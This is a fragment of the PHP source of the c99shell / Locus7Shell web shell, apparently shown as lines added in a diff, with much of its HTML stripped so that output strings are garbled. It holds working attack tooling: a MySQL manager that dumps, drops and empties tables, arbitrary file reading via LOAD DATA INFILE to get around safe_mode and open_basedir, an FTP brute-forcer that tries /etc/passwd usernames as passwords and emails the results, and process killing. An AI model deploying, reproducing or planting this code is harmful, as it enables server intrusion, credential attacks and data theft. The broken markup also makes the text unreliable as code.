($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) + { + echo ""; + if ($tbl_struct) + { + echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":



     
    Fields:
    "; + foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ ".$name."
    ";} + echo "
    "; + } + } + if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} +} +} +if (!function_exists("mysql_create_db")) +{ +function mysql_create_db($db,$sock="") +{ + $sql = "CREATE DATABASE `".addslashes($db)."`;"; + if ($sock) {return mysql_query($sql,$sock);} + else {return mysql_query($sql);} +} +} +if (!function_exists("mysql_query_parse")) +{ +function mysql_query_parse($query) +{ + $query = trim($query); + $arr = explode (" ",$query); + /*array array() + { + "METHOD"=>array(output_type), + "METHOD1"... + ... + } + if output_type == 0, no output, + if output_type == 1, no output if no error + if output_type == 2, output without control-buttons + if output_type == 3, output with control-buttons + */ + $types = array( + "SELECT"=>array(3,1), + "SHOW"=>array(2,1), + "DELETE"=>array(1), + "DROP"=>array(1) + ); + $result = array(); + $op = strtoupper($arr[0]); + if (is_array($types[$op])) + { + $result["propertions"] = $types[$op]; + $result["query"] = $query; + if ($types[$op] == 2) + { + foreach($arr as $k=>$v) + { + if (strtoupper($v) == "LIMIT") + { + $result["limit"] = $arr[$k+1]; + $result["limit"] = explode(",",$result["limit"]); + if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} + unset($arr[$k],$arr[$k+1]); + } + } + } + } + else {return FALSE;} +} +} +if (!function_exists("c99fsearch")) +{ +function c99fsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $search_i_f; + global $search_i_d; + global $a; + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($f = readdir($h)) !== FALSE) + { + if($f != "." && $f != "..") + { + $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); + if (is_dir($d.$f)) + { + $search_i_d++; + if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} + if (!is_link($d.$f)) {c99fsearch($d.$f);} + } + else + { + $search_i_f++; + if ($bool) + { + if (!empty($a["text"])) + { + $r = @file_get_contents($d.$f); + if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} + if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} + if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} + else {$bool = strpos(" ".$r,$a["text"],1);} + if ($a["text_not"]) {$bool = !$bool;} + if ($bool) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($h); +} +} +if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} +//Sending headers +@ob_start(); +@ob_implicit_flush(0); +function onphpshutdown() +{ + global $gzipencode,$ft; + if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) + { + $v = @ob_get_contents(); + @ob_end_clean(); + @ob_start("ob_gzHandler"); + echo $v; + @ob_end_flush(); + } +} +function c99shexit() +{ + onphpshutdown(); + exit; +} +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", FALSE); +header("Pragma: no-cache"); +if (empty($tmpdir)) +{ + $tmpdir = ini_get("upload_tmp_dir"); + if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} +} +$tmpdir = realpath($tmpdir); +$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); +if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} +if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} +else {$tmpdir_logs = realpath($tmpdir_logs);} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = TRUE; + $hsafemode = "ON (secure)"; +} +else {$safemode = FALSE; $hsafemode = "OFF (not secure)";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "".$v."";} +else {$openbasedir = FALSE; $hopenbasedir = "OFF (not secure)";} +$sort = htmlspecialchars($sort); +if (empty($sort)) {$sort = $sort_default;} +$sort[1] = strtolower($sort[1]); +$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); +if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."",htmlspecialchars($DISP_SERVER_SOFTWARE)); +@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string",$highlight_string); //#DD0000 +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?><?php echo getenv("HTTP_HOST"); ?> - Locus7Shell

    Software:  

    uname -a: ",1); ?> 

    ",1);} else {echo get_current_user();} ?> 

    Safe-mode: 

    ".htmlspecialchars($b).DIRECTORY_SEPARATOR.""; + $i++; +} +echo "   "; +if (is_writable($d)) +{ + $wd = TRUE; + $wdt = "[ ok ]"; + echo "".view_perms(fileperms($d)).""; +} +else +{ + $wd = FALSE; + $wdt = "[ Read-Only ]"; + echo "".view_perms_color($d).""; +} +if (is_callable("disk_free_space")) +{ + $free = disk_free_space($d); + $total = disk_total_space($d); + if ($free === FALSE) {$free = 0;} + if ($total === FALSE) {$total = 0;} + if ($free < 0) {$free = 0;} + if ($total < 0) {$total = 0;} + $used = $total-$free; + $free_percent = round(100/($total/$free),2); + echo "
    Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)"; +} +echo "
    "; +echo "Your ip: ".$_SERVER["REMOTE_ADDR"]." - Server ip: ".gethostbyname($_SERVER["HTTP_HOST"])."
    "; +$letters = ""; +if ($win) +{ + $v = explode("\\",$d); + $v = $v[0]; + foreach (range("a","z") as $letter) + { + $bool = $isdiskette = in_array($letter,$safemode_diskettes); + if (!$bool) {$bool = is_dir($letter.":\\");} + if ($bool) + { + $letters .= "[ "; + if ($letter.":" != $v) {$letters .= $letter;} + else {$letters .= "".$letter."";} + $letters .= " ] "; + } + } + if (!empty($letters)) {echo "Detected drives: ".$letters."
    ";} +} +if (count($quicklaunch) > 0) +{ + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%sort",$sort,$item[1]); + $v = realpath($d.".."); + if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} + $item[1] = str_replace("%upd",urlencode($v),$item[1]); + echo "".$item[0]."    "; + } +} +echo "


    "; +if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "
    ".$donated_html."

    ";} +echo ""; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10)); + $line = array_slice($line,0,11); + if ($line[0] == get_current_user()) {$line[0] = "".$line[0]."";} + $line[] = "KILL"; + $prcs[] = $line; + echo ""; + } + } + } + else + { + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg("",$ret)) {$ret = str_replace("","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + $ret = convert_cyr_string($ret,"d","w"); + $stack = explode("\n",$ret); + unset($stack[0],$stack[2]); + $stack = array_values($stack); + $head = explode("",$stack[0]); + $head[1] = explode(" ",$head[1]); + $head[1] = $head[1][0]; + $stack = array_slice($stack,1); + unset($head[2]); + $head = array_values($head); + if ($parsesort[1] != "a") {$y = "";} + else {$y = "";} + if ($k > count($head)) {$k = count($head)-1;} + for($i=0;$i".trim($head[$i])."";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo ""; + $line = explode("",$line); + $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); + $line[2] = intval(str_replace(" ","",$line[2]))*1024; + $prcs[] = $line; + echo ""; + } + } + } + $head[$k] = "".$head[$k]."".$y; + $v = $processes_sort[0]; + usort($prcs,"tabsort"); + if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} + $tab = array(); + $tab[] = $head; + $tab = array_merge($tab,$prcs); + echo "
    "; +if ($act == "") {$act = $dspact = "ls";} +if ($act == "sql") +{ + $sql_surl = $surl."act=sql"; + if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + $sql_surl .= "&"; + ?>

    Attention! SQL-Manager is NOT ready module! Don't reports bugs.

    "; + if (!$sql_sock) {?>"; + } + echo "
    SQL Manager:
    "; + if (!$sql_sock) + { + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "
    Can't connect
    "; echo "".$err."";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + echo "
    MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
    "; + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + } + echo "
    i
  • If login is null, login is owner of process.
  • If host is null, host is localhost
  • If port is null, port is 3306 (default)
  •  Please, fill the form:
    UsernamePassword Database 
    HostPORT
    ">Home
    ".htmlspecialchars($sql_db)." ]---
    "; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "".htmlspecialchars($row[0])." (".$count_row[0].")
    "; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else + { + ?>
    Home

    Please, select database
    "; + //Start center panel + $diplay = TRUE; + if ($sql_db) + { + if (!is_numeric($c)) {$c = 0;} + if ($c == 0) {$c = "no";} + echo "
    There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").
    "; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + $acts = array("","dump"); + if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} + elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} + elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") + { + if ($sql_tbl_insert_radio == 1) + { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) + { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") + { + echo "
    "; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "



     
    ";} + } + if (in_array($sql_act,$acts)) + { + ?>
    Create new table:
     
    Dump DB:
    "> 
    ";} + if ($sql_act == "newtbl") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    "; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_smarterror();} + } + elseif ($sql_act == "dump") + { + if (empty($submit)) + { + $diplay = FALSE; + echo "
    SQL-Dump:

    "; + echo "DB: 

    "; + $v = join (";",$dmptbls); + echo "Only tables (explode \";\") 1: 

    "; + if ($dump_file) {$tmp = $dump_file;} + else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + echo "File: 

    "; + echo "Download:  

    "; + echo "Save to file:  "; + echo "



    1 - all, if empty"; + echo "
    "; + } + else + { + $diplay = TRUE; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["print"] = 0; + $set["nl2br"] = 0; + $set[""] = 0; + $set["file"] = $dump_file; + $set["add_drop"] = TRUE; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + $ret = mysql_dump($set); + if ($sql_dump_download) + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($ret)); + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + echo $ret; + exit; + } + elseif ($sql_dump_savetofile) + { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) {echo "Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} + else + { + fwrite($fp,$ret); + fclose($fp); + echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")."; + } + } + else {echo "Dump: nothing to do!";} + } + } + if ($diplay) + { + if (!empty($sql_tbl)) + { + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) {$perpage = 10;} + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) + { + if ($e[0] == "d") {$asc_desc = "DESC";} + else {$asc_desc = "ASC";} + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + } + else {$v = "";} + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "
    Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)
    "; + echo "Structure ]   "; + echo "Browse ]   "; + echo "Dump ]   "; + echo "Insert ]   "; + if ($sql_tbl_act == "structure") {echo "

    Coming sooon!";} + if ($sql_tbl_act == "insert") + { + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + if (!empty($sql_tbl_insert_radio)) + { + + } + else + { + echo "

    Inserting row into table:
    "; + if (!empty($sql_tbl_insert_q)) + { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("

    ".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } + else {$values = array();} + echo "
    "; + foreach ($tbl_struct_fields as $field) + { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) {$v = "";} + echo ""; + $i++; + } + echo "
    FieldTypeFunctionValue
    ".htmlspecialchars($name)."".$field["Type"]."

    "; + echo "Insert as new row"; + if (!empty($sql_tbl_insert_q)) {echo " or Save"; echo "";} + echo "

    "; + } + } + if ($sql_tbl_act == "browse") + { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo "
    "; + echo "\"Pages\" "; + $b = 0; + for($i=0;$i<$numpages;$i++) + { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "
    ";} + else {echo " ";} + } + if ($i == 0) {echo "empty";} + echo "
    From:  To:  
    "; + echo "
    "; + echo ""; + echo ""; + for ($i=0;$i"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "".$v."";} + else {echo "".$v."\"".$m."\"";} + echo ""; + } + echo ""; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + echo ""; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo ""; + $i = 0; + foreach ($row as $k=>$v) + { + $v = htmlspecialchars($v); + if ($v == "") {$v = "NULL";} + echo ""; + $i++; + } + echo ""; + echo ""; + } + mysql_free_result($result); + echo "
    Action
    ".$v.""; + echo "\"Delete\" "; + echo "\"Edit\" "; + echo "

     

    "; + } + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + echo "
    "; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + $i++; + } + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo "
    Table
    RowsTypeCreatedModifiedSizeAction
     ".$row["Name"]." ".$row["Rows"]."".$row["Type"]."".$row["Create_time"]."".$row["Update_time"]."".$size." \"Empty\"  \"Drop\" \"Insert\" 
    +
    ".$i." table(s)
    ".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."

     

    "; + mysql_free_result($result); + } + } + } + } + } + else + { + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) {?>
    Create new DB:
     
    View File:
     
    "; + if ($sql_act == "newdb") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    ";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason:
    ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "
    Server-status variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "
    Server variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "
    Processes:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} + echo "
    IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
    ".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
    "; + mysql_free_result($result); + } + if ($sql_act == "getfile") + { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + if ($select) + { + $created = FALSE; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) {echo "Error in reading file (permision denied)!";} + else + { + for ($i=0;$iFile \"".$sql_getfile."\" does not exists or empty!
    ";} + else {echo "File \"".$sql_getfile."\":
    ".nl2br(htmlspecialchars($f))."
    ";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); //comment it if you want to leave database + } + } + } + } + echo "
    "; + if ($sql_sock) + { + $affected = @mysql_affected_rows($sql_sock); + if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} + echo "
    Affected rows: ".$affected."
    "; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) + { + if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";} + elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";} + echo "

    "; + } + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "Ftp Quick brute:
    "; + if (!win) {echo "This functions not work in Windows!

    ";} + else + { + function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { + if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} + else {$TRUE = TRUE;} + if ($TRUE) + { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "Connected to ".$host." with login \"".$login."\" and password \"".$pass."\".
    "; + ob_flush(); + return TRUE; + } + } + } + if (!empty($submit)) + { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + if ($fqb_logging) + { + if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} + else {$fqb_logfp = FALSE;} + $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; + if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { + echo "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"
    "; + $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + $success++; + ob_flush(); + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "
    Done!
    Total time (secs.): ".$ftpquick_t."
    Total connections: ".$i."
    Success.: ".$success."
    Unsuccess.:".($i-$success)."
    Connects per second: ".round($i/$ftpquick_t,2)."
    "; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} + fclose($fqb_logfp); + } + } + else + { + $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; + $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); + echo "

    Read first:

    Users only with shell? 

    Logging? 
    Logging to file? 
    Logging to e-mail? 

    "; + } + } +} +if ($act == "d") +{ + if (!is_dir($d)) {echo "
    Permision denied!
    ";} + else + { + echo "Directory information:"; + if (!$win) + { + echo "
    Owner/Group "; + $ow = posix_getpwuid(fileowner($d)); + $gr = posix_getgrgid(filegroup($d)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + } + echo "
    Perms".view_perms_color($d)."
    Create time ".date("d/m/Y H:i:s",filectime($d))."
    Access time ".date("d/m/Y H:i:s",fileatime($d))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."

    "; + } +} +if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} +if ($act == "security") +{ + echo "
    Server security information:
    Open base dir: ".$hopenbasedir."
